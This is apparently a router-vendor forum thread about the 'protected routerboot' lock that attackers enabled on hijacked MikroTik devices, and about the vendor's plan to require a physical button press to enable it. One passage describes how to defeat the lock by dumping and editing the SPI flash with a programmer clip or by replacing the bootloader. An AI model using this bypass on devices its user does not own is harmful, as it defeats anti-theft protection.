For some reason netinstall v7 was always flaky, the device boots, does the tftp transfer but it doesn't show up in netinstall, you have to close netinstall after tftp transfer finishes and reopen netinstall, then the device shows up and you can hit install on it. Smells like a bug.

On my tests on 6.47.10, when you use correct reset timing, all values are set to default, included all the various protected-routerboard settings.

it will mean that you must hold the button 60 to 65 seconds, not less and not more, making guesses impossible

On 6.47.10 is impossible to set time differencies less than 10 seconds between reformat-hold-button and reformat-hold-button-max

/system/reset-configuration does not alter routerboard settings, that includes protected routerboot.

Exactly this on 6.47.10 i used for tests

If you use a new software version and did not open up your firewall to the whole world, there is no reason to worry about remote attackers.
Also, just don't use the protected bootloader mode. It is only for specific situations, where you want to deny reset and recovery.

Someone asks:
Even with the new requirement for the protected bootloader to press a button, someone with bad intentions can still downgrade and .. you know?

One extra security feature:
To downgrade from a newer software, you need to press the button.
To upgrade its not needed...

Think twice:
RouterOS is full of discovered and undiscovered errors, if you need to downgrade for some reason not discovered before, how to downgrade devices 200km away?

Someone asks:
Even with the new requirement for the protected bootloader to press a button, someone with bad intentions can still downgrade and .. you know?

Like actually already is: RouterOS can be downgradable not after factory RouerOS,
but RouterBOOT can't be downgradable after the factory RouterBOOT version.
If the new RouterOS upgrade the factory boot code, is impossible go back with RouterBOOT,
but RouterOS can be downgradable, and is unable to change protected-routerboot values on new RouterBOOT.

[...]
Hi, We are quite sure because over 15pcs of router has the same issue, before that we are using old version 6.3xx after upgrading to 6.49 the same issue reappear

All these button pressing confirmation because Bob here didn't update his routers in 6 years.
You can add all the security measures you want, Bob is not alone in the world, these Bobs won't update their routers, Botnets feed on Bobs routers, Next Bob will write on the forum that "he can't recover his MikroTik that he didn't touch in the last 6 years".
All this button pressing confirmation seems futile.

@Znevna, remember: some user do not know the differencies between RouterOS and RouterBOOT, and update only RouterOS, leaving only "factory" RouterBOOT version....

That's not an issue here, the "new (already addded in v7?) press button to confirm protected routerboot" is a RouterOS thing, RouterOS validates the change with the press of a button and sets it to enabled, if it's not confirmed it sets it back to disabled. RouterBOOT has nothing to do with it.

The v7 cannot enable (pressed the button or not) features not present on the RouterBOOT ...
The reset button on startup are things of RouterBOOT, RouterOS may not be present.

If FACTORY RouterBOOT are older than 6.43.7, the v7 can not do anything about successfully reuse,
is why is released on the past for the first time the FACTORY RouterBOOT upgrade,
because prior to 6.43.7, a "bug" make protected-routerboot useless...

https://wiki.mikrotik.com/wiki/Manual:R ... bootloader

viewtopic.php?t=94303#p580430

If FACTORY RouterBOOT are older than 6.43.7, the v7 can not do anything about successfully reuse,

According to current experience, ROS v7 will enter endless bootloop on gadgets with ancient routerboot versions and gadget will be unhackable anyway.

I am a perfect example, I have no clue what you mean by bootloader.
I upgrade the firmware and then upgrade the SYSTEM routerboard, keep them always in sync...........
I do not know where to find bootloader or why I would need it.

I dont want my Router, if hacked remotely, to no longer be recoverable by netinstall,
SIMPLE>>>>>>>>>>>>>>>>

of course not that it will be hacked but just sayin..........

of course not that it will be hacked but just sayin..........

Never say never.
Plenty of people had that same thought.
It would never happen to them, always to others.

Exactly and thus I dont want to the unit in a mode, if hacked, that I cannot recover from.

well, nobody thought ROS would serve the users credentials file to any unauthenticated remote attacker too.. fortunately this time it was tied to Winbox, so all quality setups had it disabled, but this is no Mikrotik's credit, it is just luck this time. Because no matter what, they made one of the highest severity vulnerabilities.

Mikrotik should't have listened to those whining ISPs, but the button thing will probably work - I'd still rather buy devices without this function.

That is a good point about downgrade

I am not complaining nor want to............. just want to make sure that if something unexpected happens, that I can recover vice buy a new unit.
If i need the added functionality and thus the additional risk, that should be an admins choice, and not a default that those of us have to accept and which we have no control over!!

AVM (Fritz!) has implemented the push button a long time ago after setting in routers where made by hackers to call expensive phone numbers abroad. They received the money spend on those calls.

They acted swiftly after the it became known that it happened. Now, if you have a phone connected box you have to enter the shown code on your screen or press any button on the box.

This goes for every big change you make. You are allowed to swtch it off if you feel up to it.

For remote changes over the Internet you need "Google Authenticator-app" to that.

If Mikrotik want to see what home device should do they buy a Fritz!box and have peek. This so to not invent it all again and pay the price for leaving holes that can be misused.

I AM complaining.. I hate this chance to get my ~$1000 1036s, 354s and all these expensive devices bricked and scrapped because some damn ISPs are whining about people stealing their $35 antennas. If someone stole from you, sue him. I have always thought netinstall is the last fallback, that will work no matter what happened to the software, I must say I am disappointed by this function. And no, I haven't been hacked and my devices are properly secured

Perhaps MikroTik could add something in the future that could prevent downgrade to the older versions that allowed setting this without pushing the button?

@XT22 it was suggested to make this a optional package. I suggest to have this for the higher segment.

For ISP produce different firmwares that have the protection build-in with also TR-069 build-in.

A client of an ISP can't change firmware because of Routerboot and theft is not paying out.

ROS-7.x seems to become a complete package without choice about packages. Then why not create two version, one without protection and one with protection. The buyer decides which version is going to be used.

I disagree about having to make versions with and without protection and it is hard to ensure that that resolves the issue, and it certainly probably doesn't with older versions and the potential threat of a downgrade.

I think it is a feature they can leave in there, but I wonder if they can potentially add something to prevent devices from being downgraded beyond a certain point - say, a special package that gets installed to change the minimum version that the router believes it needs to use in order to work, and the downgrade would fail to anything lower than that. Like the fix_space.npk, it would install and then disappear after fixing the issue. Or, add a button that does the same thing. After a certain amount of time has elapsed, they could just prevent downgrades across the board to versions vulnerable to this.

Such a thing might even be good for other vulnerabilities. "Prevent downgrades below current RouterOS version", in case someone downgrades a router on purpose to make it more vulnerable.

Such package already exist, I have already post that:

[...]
is why is released on the past for the first time the FACTORY RouterBOOT upgrade,
because prior to 6.43.7, a "bug" make protected-routerboot useless...
[...]

viewtopic.php?t=94303#p580430

Is not possible downgrade RouterBOOT or RouterOS prior to factory version.

Simply release another upgrade for FACTORY RouterBOOT version that require the button press for confirm BOTH timing change an enable protected-routerboot

Whatever is done just make sure the nomenclature is clear.

a. VERSION DANGEROUS ( all those that may require the ability to make their device remotely changeable on the bootloader and if compromised the device is garbage)
b. VERSION SAFE (all those that do not want to expose the bootloader to hacker under any circumstance (remotely), netinstall will always recover the device)

SAFE 7.2
Dangerous 7.2

S7.2
D7.2

Just an extra, SecureBoot supporting version is sufficient. ROS7.1rc6-SB for example.

Edit: ....there is still a chance that, a way is found to activate secure boot. I think it is better that the boot code comes in two versions. ROS should detect if the device supports and so there is only one ROS version needed.
That can still can be changed a secure boot version, if the router ishacked. Then the press button on change will avoid using that after reboot, this is being misused.

100% assurance is not possible here.

Is not possible downgrade RouterBOOT or RouterOS prior to factory version.

This isn't always the case - it is actually sometimes possible to downgrade RouterOS below the factory version (my coworker did it before), but it is not true for RouterBOOT - it is always impossible to downgrade RouterBOOT below the factory version. I'm not sure what rules dictate which downgrades are OK for RouterOS itself.

Look at the 5009, it comes with 7.05. The later versions will have 7.09 as default.

Is not possible downgrade RouterBOOT or RouterOS prior to factory version.

This isn't always the case - it is actually sometimes possible to downgrade RouterOS below the factory version (my coworker did it before), but it is not true for RouterBOOT - it is always impossible to downgrade RouterBOOT below the factory version. I'm not sure what rules dictate which downgrades are OK for RouterOS itself.

Again: do not confure RouterOS with RouerBOOT.

Factory RouterBOOT readable on /system routerboard
Factory RouterOS (when set, obviously) on /system resources

Is possible to install RouterOS 5.x (yes 5.x) on (supported) routerboard than have 6.47.3 as RouterBOOT and Factory Software undefined.

Is possible to install for example RouterOS 6.10 on routerboard than have 6.47.3 as RouterBOOT and Factory Software 6.10 or less (or undefined)

But is impossible on standard way to set "current" RouterBOOT version lower than factory RouterBOOT.

Easy way to remove protection: (solution by @r00t)

[...]
Desold the SPI flash, change the bytes that in bootloader configuration block that lock the device and solder it back.
At least it's just SPI chip that's not that hard to work with and can be programmed with cheap CH341A programmer
(just make sure if you buy one off ebay to fix it so it's 3.3V, as default is 5V and that WILL fry your SPI memory!).
[...]

viewtopic.php?f=3&t=176437&p=865575&hilit=600#p865609

I am begging MT not to use Rextended's advice that many of us should start de-soldering our circuit boards.
First of all my eyes are too old to see things that small and more importantly Rextended has told me he will not pay me for a new CCR1009 if I break it. ;-PP

I think our definitions of EASY are different.

Easy way to build a tower???
.......

You don't have to desolder the SPI chip unless it's faulty, programming clip does the job quickly: Also there are many ways on how to deal with this problem once you have access to the flash chip:
- find actual value in seconds in memory, so you know how long you have to press the button
- modify bootloader configuration or flash contents so it boots from LAN
- replace bootloader with old one that doesn't have this functionality
But first step is always to take a full memory dump so in case you do something wrong later, it's fully reversible.
Also if multiple devices were hacked by a same person, it's possible protected routerboot timeout will be same on all of them, so dumping just one may do the job.

I'm not saying this is user friendly way of fixing this problem for everyone and 100% agree there should be some way for Mikrotik to make sure protected routerboot can't be enabled without hardware confirmation (the button press method sounds good) by a user. Also some devices have BGA flash memory chips and for these there is no easy access. The boards with SPI chips are the easiest to work with.

If everything fails, at least put the bricked hardware on ebay... someone may be able to fix it or use it for parts. Re-use is always better option for environment then recycling...

Memories of long gone times seeing such clip again ...

Easy way to build a tower???

The tower generate more money on that way than a standard tower... ahahahahah.......

Easy way to build a tower???

The tower generate more money on that way than a standard tower... ahahahahah.......

Yes, it was architectural stupidity but marketing genius LOL

Looks like RouterOS 7 currently.

There are information about windows malware, that knows how to connect to MT router with default password and make a configuration changes to add it to botnet.

So admin: no password to local network are not safe anymore.

Well this has to be changed by MikroTik anyway, as it will be forbidden to sell devices in the EU from 2024 in the state as it is now (standard default password).
Other manufacturers are already selling devices with default password printed on a sticker, not derived from MAC address or serial number.
Some recent "pre-configured" MikroTik devices have this as well, but the password is lost on a factory reset. So that still has to be improved.

This is REALLY bad practice. I hate that they are doing with this LHG60 products and really, really hope they don't introduce random passwords to devices

It sounds good in theory but not in practice. Like putting 100 automatic locks on your front door 'sounds' way more secure than until you realize it takes you 2 hours every time you want to go back inside and just pisses everybody off
Radio's are predominantly installed by field techs and should be accessible for initial config. When they forget to take a photo (or its blurry/unreadable) of the included sticker then remote support cannot log in and set the device up properly. And if the sticker has been lost/damaged and device is factory reset for any reason, you are completely fk'd and cannot get into it. Meaning someone needs to climb the tower to replace the radio, a 5 minute outage suddenly turns into hours/days and hugely service impacting

Now do the same thing to routers everywhere..... we sometimes have to remote in and reconfigure a device for whatever reason. If it is in another city/state/country and we can't get to it............ you see what I mean?
This 'solution' is a bigger problem than the initial problem. Stupid panic reaction to a few edge cases and nobody wanting to accept responsibility so they blanket the entire industry with a snap reactionary proposal

I understand what the problem is, and I have face that thing with AVM equipment (both the knowledge of the password and the need for pressing a button to make certain changes).
But I also see what happens when such measures are not implemented: hundreds of thousands of MikroTik routers forming a botnet. Other manufacturers have used hashing functions to have a predictable password when knowing the MAC address, but it has proven not to be secure.

So you can expect this to be implemented, and you will need to keep an administration of the default passwords of all equipment you have in service.
Of course you should still change the password to something you only know yourself. But as you indicate, you might need the default password after the device has been reset.

So you can expect this to be implemented, and you will need to keep an administration of the default passwords of all equipment you have in service.
Of course you should still change the password to something you only know yourself. But as you indicate, you might need the default password after the device has been reset.

That horse has already left the barn long time ago.
You have to keep track of all passwords, also default ones, if you like it or not.
And never leave a default password available for something in service.

It's nowadays never a question IF someone can breach your network but WHEN. If those guys think your environment can be interesting to them, they WILL get in.
Leave default passwords and make it much easier for the perv to do further damage to your devices.
Or not.

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.

Hello Normis,
I would like to ask you for help if it is possible. We are a company that provides IT services and we use MikroTik equipment. Unfortunately, we have been the target of an attack and attack on the MikroTik device, which was subsequently encrypted and cannot be logged in, nor can we perform a classic device reset or Netinstall. Is there any way to save the equipment and put it back into service? Thank you so much
Sincerely Martin

For you it is already too late and you will need the drastic methods shown above...